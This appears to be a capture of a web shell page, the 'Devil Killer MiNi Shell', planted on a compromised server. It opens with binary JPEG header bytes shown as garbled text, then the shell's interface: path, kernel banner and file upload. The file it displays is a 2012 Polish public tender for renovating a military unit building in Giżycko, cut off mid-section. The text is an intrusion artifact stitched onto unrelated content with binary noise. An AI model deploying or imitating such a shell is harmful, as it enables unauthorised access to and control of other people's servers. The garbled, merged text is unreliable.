JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120221/41337-N-2012.html

<p class="kh_header"><b>Giżycko: Konserwacja pomieszczeń II i III piętra z częściową wymianą stolarki okiennej i drzwiowej oraz podłóg, naprawa węzłów sanitarnych, wymiana wewnętrznej instalacji elektrycznej i pionów kanalizacyjnych, malowanie wewnętrzne w budynku nr 3 JW. 4352 w Giżyckuul. Nowowiejska 20 - 09/2012</b><br>
<b>Numer ogłoszenia: 41337 - 2012; data zamieszczenia: 21.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www. 24wog.wp.mil.pl.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja pomieszczeń II i III piętra z częściową wymianą stolarki okiennej i drzwiowej oraz podłóg, naprawa węzłów sanitarnych, wymiana wewnętrznej instalacji elektrycznej i pionów kanalizacyjnych, malowanie wewnętrzne w budynku nr 3 JW. 4352 w Giżyckuul. Nowowiejska 20 - 09/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje: 
Roboty budowlane III piętro
- Rozebranie podłóg drewnianych ze złożeniem na odkład do ponownego wbudowania. 
- Demontaż przepierzenia z desek na parterze budynku.
- Zerwanie posadzki cementowej.
- Rozebranie izolacji stropu z trocin gr.20cm.
- Wykucie ościeżnic drzwiowych metalowych o pow. ponad 2m2.
- Wywóz gruzu samochodami samowyładowczymi na odległość do 5km.
- Wywóz elementów metalowych pochodzących z rozbiórki samochodami skrzyniowymi do magazynu Soi w Giżycku (na odległość do 1km).
- Osadzenie ościeżnic metalowych o szer. 100cm - 6szt.
- Osadzenie ościeżnic metalowych o szer. 80cm - 5szt.
- Osadzenie ościeżnic metalowych o szer. 110cm - 5szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych (kolor do uzgodnienia z inwestorem) o szer.80cm z zamkiem wpuszczanym i klamką - 11szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych (kolor do uzgodnienia z inwestorem) o szer.100cm z zamkiem wpuszczanym i klamką - 6szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych (kolor do uzgodnienia z inwestorem) o szer.110cm z zamkiem wpuszczanym i klamką - 7szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych z małą szybą (kolor do uzgodnienia z inwestorem) o szer.80cm z zamkiem łazienkowym, klamką i kratką wentylacyjną - 5 szt.
- Osadzenie drzwi antywłamaniowych klasy C o szer.100cm wraz z ościeżnicą - 2szt.
- Montaż drzwi aluminiowych wewnętrznych łukowych, wahadłowych o wymiarach 2,7x2,82. Z dwoma naświetlami bocznymi w górnej części łukowe przeszklone, natomiast w dolnej części  wypełnione panelem pełnym. Drzwi wyposażone w samozamykacz podłogowy oraz zamek z wkładką patentową.
- Osadzenie progów drzwiowych.
- Montaż szafki pod zlewozmywak dwukomorowy.
- Wymiana drewnianych belek stropowych.
- Przybicie desek podłogowych pochodzących z rozbiórki w celu wypoziomowania podłogi.
- Montaż płyty OSB gr.25mm na korytarzu oraz w pomieszczeniu przy WC.
- Ułożenie posadzi z wykładziny z tworzyw sztucznych, wykładzina PCV obiektowa, antystatyczna, homogeniczna o stopniu ścieralności klasa V grupa P, antypoślizgowość R9, trodnozapalność kl.BFL-S1, klasa zastosowania 20-34-43.
- Zgrzewanie wykładzin PCV.
- Osadzenie listew przyściennych.
- Posadzki z płytek terakotowych 30x30cm w WC, umywalniach i w pomieszczeniu gospodarczym. 
- Ułożenie cokolików w pomieszczeniach jw.
- Wykonanie ścianek działowych w sanitariatach i umywalniach gr. 6cm z cegły dziurawki.
- Obmurowanie otworów drzwiowych cegła dziurawką w miejscach po demontażu ościeżnic.
- Wykonanie tynków kat. III na ścianach w sanitariatach i umywalniach.
- Osadzenie kratek wentylacyjnych.
- Wykonanie pasów tynków kat. III w miejscach po obmurowań po demontażu ościeżnic.
- Wykonanie izolacji poziomej z folii w płynie na posadzkach w sanitariatach i umywalniach.
- Wykonanie izolacji pionowej z folii w płynie na ścianach w sanitariatach i umywalniach.
- Obłożenie ścian glazurą w pomieszczeniach jw. oraz pomieszczeniu gospodarczym.
- Wykonanie dwuwarstwowej gładzi szpachlowej na ścianach i sufitach.
- Dwukrotne malowanie ścian i sufitów farba emulsyjną z zagruntowaniem.
- Malowanie lamperii farbą olejną dwukrotnie na korytarzu.
- Malowanie dwukrotnie farbą olejną grzejników radiotorowych.
- Malowanie jednokrotne farbą olejną rur o śr. do 50mm.
- Malowanie dwukrotnie farbą olejną rur o śr. od 50 do 100mm.

Roboty budowlane II piętro
- Rozebranie posadzek z wykładziny PCV.
- Rozebranie posadzek z lastrykowych w łazienkach i sanitariatach.
- Rozebranie ścianek działowych łącznie z glazura w sanitariatach i umywalniach.
- Skucie okładzin ścian z glazury w pomieszczeniach jw.
- Skucie półek z glazury w umywalniach.
- Wykucie okien drewnianych o pow. ponad 2m2.
- Wykucie ościeżnic drzwiowych drewnianych o pow. do 2m2.
- Wykucie ościeżnic drzwiowych drewnianych o pow. ponad 2m2.
- Wykucie ościeżnic drzwiowych metalowych o pow. ponad 2m2.
- Rozbiórka podsufitki z desek otynkowanych w umywalni.
- Demontaż parapetów zewnętrznych z blachy nienadającej się do użytku.
- Wykucie z muru parapetów drewnianych.
- Demontaż obudowy wnęk z desek.
- Wywóz gruzu samochodami samowyładowczymi na odległość do 5km.
- Wywóz elementów metalowych pochodzących z rozbiórki samochodami skrzyniowymi do  magazynu Soi w Giżycku (na odległość do 1km).
- Wykonanie warstwy wyrównawczej i wygładzającej z zaprawy samopoziomującej gr. 5mm.
- Ułożenie posadzki z wykładziny z tworzyw sztucznych z wywinięciem na ściany 10cm,wykładzina PCV obiektowa, antystatyczna, homogeniczna o stopniu ścieralności klasa V grupa P, antypoślizgowość R9, trodnozapalność kl.BFL-S1, klasa zastosowania 20-34-43.
- Zgrzewanie wykładzin PCV.
- Posadzki z płytek terakotowych 30x30cm w sanitariatach i umywalniach.
- Ułożenie cokolików w pomieszczeniach jw.
- Oznaczenie progów znakami ostrzegawczymi 2szt.
- Osadzenie okien PCV o wym. 1,0x2,15 - szt.16.
- Osadzenie okien PCV o wym. 1,3x2,22 - szt.4.
- Osadzenie okien PCV o wym. 1,4x2,16 - szt.3.
- Obmurowanie otworów okiennych po demontażu okien cegłą dziurawką.
- Osadzenie narożników wypukłych metalowych w miejscach po obmurowaniu otworów okiennych.
- Uzupełnienie tynków zewnętrznych kat. III na ościeżach. 
- Uzupełnienie tynków wewnętrznych kat. III na ościeżach. 
- Wykonanie spadków pod obróbki blacharskie - pod parapety zewnętrzne.
- Osadzenie parapetów zewnętrznych z blachy ocynkowanej gr. 0,55mm.
- Osadzenie w kancelariach parapetów wewnętrznych z konglomeratu gr.3cm dł. 120cm -16szt i dł.160cm -2szt.
- Osadzenie krat stalowych w o pow. ponad 2m2.
- Wykonanie ścianek działowych w sanitariatach i umywalniach gr. 6cm z cegły dziurawki.
- Wykonanie obudowy pionów kanalizacyjnych z płyty gipsowo kartonowej gr.12,5mm wodoodpornej w sanitariatach i umywalniach.
- Wykonanie okładziny stropu z dwóch warstw płyty gipsowo kartonowej gr.12,5mm 
wodoodpornej.
- Zamurowanie wnęk gazo betonem gr.6cm.
- Wykonanie tynków kat. III na ścianach w sanitariatach i umywalniach oraz w miejscu zamurowania wnęk.
- Osadzenie kratek wentylacyjnych.
- Wykonanie izolacji poziomej z folii w płynie na posadzkach w sanitariatach i umywalniach.
- Wykonanie izolacji pionowej z folii w płynie na ścianach w sanitariatach i umywalniach.
- Obłożenie ścian glazurą w pomieszczeniach jw. 
- Osadzenie ościeżnic metalowych o szer. 80cm - 8szt.
- Osadzenie ościeżnic metalowych o szer. 90cm - 3szt.
- Osadzenie ościeżnic metalowych o szer. 110cm - 12szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych (kolor do uzgodnienia z inwestorem) o szer.90cm z zamkiem wpuszczanym i klamką - 3szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych (kolor do uzgodnienia z inwestorem) o szer.110cm z zamkiem wpuszczanym i klamką - 14szt.
- Osadzenie skrzydeł drzwiowych płytowych okleinowanych z małą szybą (kolor do uzgodnienia z inwestorem) o szer.80cm z zamkiem łazienkowym, klamką i kratką wentylacyjną - 8 szt.
- Osadzenie drzwi antywłamaniowych klasy C o szer.100cm wraz z ościeżnicą - 1szt.
- Osadzenie progów drzwiowych.
- Zeskrobanie starej farby z powierzchni ścian i sufitów.
- Skasowanie zacieków i wykwitów.
- Ługowanie farby olejnej z tynków ścian - lamperii.
- Wykonanie jednowarstwowej gładzi szpachlowej na ścianach i sufitach.
- Dwukrotne malowanie ścian i sufitów farba emulsyjną z zagruntowaniem.
- Jednokrotne malowanie drzwi farbę olejną.
- Malowanie lamperii farbą olejną dwukrotnie na korytarzu.
- Malowanie dwukrotnie farbą olejną grzejników radiotorowych.
- Malowanie jednokrotne farbą olejną rur o śr. do 50mm.

Roboty sanitarne II i III piętro
- Wykucie bruzd poziomych w ścianach z cegieł 1,4x1,2 cegły.
- Wykucie bruzd pionowych w ścianach z cegieł 1,4x1,2 cegły.
- Przebicie otworów w ścianach z cegieł gr.1,4 cegły.
- Przebicie otworów w stropach ceramicznych.
- Rozebranie rurociągu fi 15 ze stali ocynkowanej.
- Rozebranie rurociągu fi 20 ze stali ocynkowanej.
- Rozebranie rurociągu fi 25 ze stali ocynkowanej.
- Rozebranie rurociągu fi 32 ze stali ocynkowanej.
- Demontaż hydrantu ściennego fi 50mm.
- Demontaż skrzynki hydrantowej ściennej.
- Demontaż skrzynki hydrantowej wnękowej.
- Rozebranie mieszacza natryskowego fi 15x20 i 20x25mm.
- Demontaż zaworu czerpalnego (wypływowego) bez korkowania podejścia fi 15mm.
- Demontaż baterii umywalkowej pojedynczej.
- Demontaż zaworu przelotowego fi 15mm.
- Demontaż zaworu przelotowego fi 20mm.
- Demontaż zaworu przelotowego fi 25mm.
- Demontaż zaworu zwrotnego fi 20mm.
- Montaż rurociągów fi 15 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach - podwójnie ocynkowane.
- Montaż rurociągów fi 20 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach - podwójnie ocynkowane.
- Montaż rurociągów fi 25 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach - podwójnie ocynkowane.
- Montaż rurociągów fi 32 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach - podwójnie ocynkowane.
- Montaż rurociągów fi 15 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach.
- Montaż rurociągów fi 20 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach.
- Montaż rurociągów fi 25 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach.
- Montaż rurociągów fi 32 z rur stalowych ocynkowanych o połączeniach gwintowanych na ścianach.
- Osadzenie zaworu przelotowego sieci wodociągowej fi 15mm.
- Osadzenie zaworu przelotowego sieci wodociągowej fi 20mm.
- Osadzenie zaworu przelotowego sieci wodociągowej fi 25mm.
- Osadzenie zaworu przelotowego sieci wodociągowej fi 32mm.
- Osadzenie dwuzłączki fi 15mm.
- Osadzenie dwuzłączki fi 20mm.
- Osadzenie dwuzłączki fi 25mm.
- Osadzenie dwuzłączki fi 32mm.
- Osadzenie zaworu kulowego ze złączką w inst. wodociągowej do węża z rur fi 15mm.
- Osadzenie zaworu hydrantowego fi 50mm na ścianie.
- Osadzenie szafki hydrantowej naściennej fi 52mm z wyposażeniem (prądownica, wąż płasko składany o dł. 20m, bęben - kosz na wąż fi 52mm).
- Szafki hydrantowa wnękowa z wyposażeniem (prądownica, wąż płasko składany o dł. 20m, bęben - kosz na wąż fi 52mm).
- Dodatek za wykonanie podejścia dopływowego do zaworów wypływowych, baterii, hydrantów, mieszaczy fi 15mm.
- Dodatek za wykonanie podejścia dopływowego do płuczek ustępowych elastycznych z tworzywa fi 15mm.
- Osadzenie baterii umywalkowej ściennej fi 15mm.
- Osadzenie baterii zmywakowej ściennej fi 15mm.
- Osadzenie baterii natryskowej z natryskiem przesuwanym fi 15mm.
- Płukanie instalacji wodociągowej w budynkach mieszkalnych.
- Wykonanie próby szczelności instalacji wodociągowej do fi 65mm.
- Wykonanie dezynfekcji rurociągów instalacji wodociągowej do fi 15mm.
- Wykonanie badań bakteriologicznych wody.
- Osadzenie zaworu do pralki fi 15x20mm.
- Osadzenie zaworu kątowego do spłuczki fi 15.
- Wykonanie izolacji z pianki poliuretanowej gr.20mm w jednej warstwie 17-38mm.
- Wykonanie izolacji z pianki poliuretanowej gr.20mm w jednej warstwie 42-57mm.
- Wykonanie izolacji z pianki poliuretanowej gr.9mm w jednej warstwie 17-38mm.
- Wykonanie izolacji z pianki poliuretanowej gr.9mm w jednej warstwie 42-57mm.
- Demontaż rurociągu żeliwnego kanalizacyjnego na ścianach budynku fi 100mm.
- Demontaż rurociągu żeliwnego kanalizacyjnego na ścianach budynku fi 150mm.
- Demontaż rurociągu PCW kanalizacyjnego na ścianach budynku fi 50mm.
- Demontaż rurociągu PCW kanalizacyjnego na ścianach budynku fi 110mm.
- Demontaż koryta żeliwnego o wym. 104x48cm.
- Demontaż brodzika żeliwnego o wym. 80x80cm.
- Demontaż ustępów z miską fajansową.
- Demontaż umywalek.
- Demontaż pisuarów.
- Demontaż wpustu żeliwnego podłogowego fi 50.
- Wykonanie rurociągów z PCW na ścianach metodą wciskową fi 50mm.
- Wykonanie rurociągów z PCW na ścianach metodą wciskową fi 75mm.
- Wykonanie rurociągów z PCW na ścianach metodą wciskową fi 110mm.
- Wykonanie rurociągów z PCW na ścianach metodą wciskową fi 160mm.
- Montaż czyszczaków kanalizacyjnych PCW łączone metodą wciskową fi 110mm.
- Montaż czyszczaków kanalizacyjnych PCW łączone metodą wciskową fi 160mm.
- Osadzenie wpustów ściekowych z tworzywa sztucznego fi 50mm.
- Syfon brodzikowy z tworzywa sztucznego fi 50mm.
- Dodatek za podejścia odpływowe z rur PCW metodą wciskową fi 50mm.
- Dodatek za podejścia odpływowe z rur PCW metodą wciskową fi 110mm.
- Montaż umywalki porcelanowej z syfonem z tworzywa sztucznego.
- Osadzenie półpostumentu porcelanowego pod umywalki.
- Osadzenie ustępu pojedynczego z płuczką z porcelany typu kompakt.
- Osadzenie pisuarów szeregowych z oddzielnymi płuczkami i wspólnym syfonem.
- Osadzenie bidetów z baterią i syfonem.
- Brodzik natryskowy metalowy o wym. 90x90cm.
- Montaż zlewozmywaka dwukomorowego ze stali nierdzewnej na szafce.
- Demontaż (do malowania) i montaż grzejnika żeliwnego członowego o pow. ogrzewania do 2,5m2.
- Demontaż (do malowania) i montaż grzejnika żeliwnego członowego o pow. ogrzewania do 5,0m2.
- Demontaż grzejnika żeliwnego członowego o pow. ogrzewania do 2,5m2.
- Demontaż grzejnika żeliwnego członowego o pow. ogrzewania do 5,0m2.
- Demontaż zaworu co połączeniu gwintowanym grzejnikowym fi 15mm.
- Montaż rurociągów fi 15 z rur stalowych o połączeniach spawanych na ścianach.
- Montaż przyłącza do grzejników C.O. żeliwnych fi 15mm.
- Montaż zaworów grzejników C.O. fi 15mm.
- Montaż zaworu odpowietrzającego automatycznego fi 15mm.
- Montaż śrubunku mosiężnego fi 15mm.
- Montaż grzejnika żeliwnego członowego o pow. ogrzewania do 2,5m2 - do wyceny należy przyjąć 4 nowe żeberka TA1, a pozostałe z demontażu.
- Montaż grzejnika żeliwnego członowego o pow. ogrzewania od 2,5m2 do 5,0m2 - do wyceny należy przyjąć 45 nowych żeberek TA1, a pozostałe z demontażu.
- Montaż grzejnika żeliwnego członowego o pow. ogrzewania do 2,5m2 - do wyceny należy przyjąć 10 nowe żeberka TA1.

Roboty elektryczne III piętro
- Osadzenie opraw świetlówkowych podwójnych przykręcanych 2x40W 2xTLD36 z odbłyskiem.
- Osadzenie opraw świetlówkowych podwójnych przykręcanych 2x40W 2xTLD36 z odbłyskiem wersja do oświetlenia awaryjnego 2h.
- Osadzenie opraw świetlówkowych do pomieszczeń produkcyjnych, przykręcane końcowe, 
pyłoodporne z tworzyw sztucznych do  2x40W.
- Montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, pt, 2-biegunowe 10A 2,5mm2 podwójne.
- Montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, pt, 2-biegunowe 10A 2,5mm2 bryzgoszczelne.
- Montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, pt, 2-biegunowe 10A 2,5mm2 wodoszczelne.
- Montaż łącznika pt 10A 250V 1-bigunowego nf 501.
- Montaż łącznika pt w puszce instalacyjnej - świecznikowy.
- Montaż łącznika pt 10A 250V schodowy nf 503.
- Osadzenie łączników i przycisków instalacyjnych bryzgoszczelnych świecznikowych.
- Osadzenie wentylatora ściennego.
- Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 1-fazowy.
- Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 3-fazowy.
- Badania i pomiary skuteczności zerowania, pomiar pierwszy.
- Badania i pomiary skuteczności zerowania, pomiary następne.

Roboty elektryczne II piętro
- Demontaż tablicy o pow. do 0,5m2.
- Demontaż łącznika nieuszczelnionego podtynkowego lub natynkowego.
- Demontaż gniazda nieuszczelnionego podtynkowego lub natynkowego.
- Demontaż gniazda uszczelnionego 2-biegunowego.
- Demontaż oprawy świetlówkowej z kloszem.
- Demontaż oprawy żarowej.
- Montaż tablicy rozdzielczej 2-rzędowej na 24 moduły bez osprzętu.
- Osprzęt modułowy w rozdzielnicach - rozłącznik lub wyłącznik przeciwporażeniowy 
 4-biegunowy.
- Osprzęt modułowy w rozdzielnicach - wyłącznik nadprądowy 3-biegunowy S303 C16.
- Osprzęt modułowy w rozdzielnicach - wyłącznik nadprądowy 1-biegunowy S301 B10.
- Osprzęt modułowy w rozdzielnicach - wyłącznik nadprądowy 1-biegunowy S301 B16.
- Montaż łącznika pt 10A 250V 1-bigunowego nf 501.
- Montaż łącznika pt w puszce instalacyjnej - świecznikowy.
- Osadzenie łączników klawiszowych 1-biegunowych 6A 250V nf 430.
- Osadzenie łączników i przycisków instalacyjnych bryzgoszczelnych świecznikowych.
- Montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, pt, 2-biegunowe 10A 2,5mm2 podwójne.
- Przygotowanie podłoża pod osprzęt instalacyjny - ślepe otwory pod mocowanie za zaprawie cementowej lub gipsowej w cegle.
- Montaż puszek instalacyjnych podtynkowych Fi 60 pojedyncze.
- Montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, pt, 2-biegunowe 16A 2,5mm2 bryzgoszczelne.
- Osadzenie opraw świetlówkowych podwójnych przykręcanych 2x40W 2xTLD36 z odbłyskiem do 40W.
- Osadzenie opraw świetlówkowych podwójnych przykręcanych 2x40W 2xTLD36 z odbłyskiem wersja do oświetlenia awaryjnego 2h.
- Osadzenie opraw świetlówkowych do pomieszczeń produkcyjnych, przykręcane końcowe, pyłoodporne z tworzyw sztucznych do  2x40W.
- Wykucie bruzd dla przewodów wtynkowych i rur o średnicy do 47mm, bruzdy dla rur RKLG18,  RS22 w gipsie, tynku, gazobetonie.
- Ułożenie przewodów kabelkowych układanych pt w gotowych bruzdach na podłożu innym niż  betonowe o przekroju 7,5mm2 YDYp 3x1,5 750V.
- Zaprawianie bruzd o szerokości do 25mm.
- Osadzenie wentylatora ściennego.
- Sprawdzenie samoczynnego wyłączania zasilania, działania wyłącznika różnicowoprądowego - próba pierwsza.
- Badania i pomiary skuteczności zerowania, pomiary następne.
- Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 1-fazowy.
- Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 3-fazowy.

Warunki realizacji zadania:
- realizacja robót w godzinach 7.00-15.30 (istnieje możliwość pracy do godziny 18.00 w dniach poniedziałek- piątek oraz do godz.15.00 w sobotę po uzgodnieniu z Dowódcą Jednostki);
-roboty będą prowadzone w budynku użytkowanym (czynny zakład);
-zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dostarczył trzy egzemplarze kosztorysów ofertowych, które będą stanowiły załączniki do umowy;
-zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy ustanowił  kierownika budowy (robót) posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie (w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane) oraz dostarczy dowód jego przynależności do Izby Inżynierów Budownictwa i aktualne ubezpieczenie OC obejmujące okres realizacji zamówienia;
-wykonawca robót (kierownik budowy) w pełni odpowiada za bezpieczeństwo i higienę pracy  w miejscu realizacji robót, oraz za zachowanie bezpieczeństwa pożarowego;
-zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dokonał ubezpieczenia budowy na kwotę nie mniejszą niż 3 335 000,00 zł. oraz dostarczył dowód ubezpieczenia;
- wykonawca zobowiązany będzie do pokrycia kosztów poboru energii elektrycznej, poboru wody i odprowadzenia ścieków związanych z realizacją robót i potrzebami socjalnymi. Sposób rozliczenia został określony we wzorze umowy.

Zamawiający dopuszcza powierzenie zamówienia podwykonawcom zgodnie z art. 36 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2010 nr 113 poz. 759 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.42.11.31-1, 45.26.25.00-6, 45.41.00.00-4, 45.32.00.00-6, 45.43.12.00-9, 45.44.42.00-8, 45.43.21.00-5, 45.42.11.32-8, 45.33.22.00-5, 45.33.23.00-6, 45.31.51.00-9, 45.33.10.00-6, 45.31.73.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy.
A.Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 12 000,00 zł. (słownie: dwanaście tysięcy złotych)
B.Wadium musi być wniesione  przed upływem terminu składania ofert.
C.Wadium może być wnoszone w jednej lub w kilku następujących formach: 
1)pieniądzu;
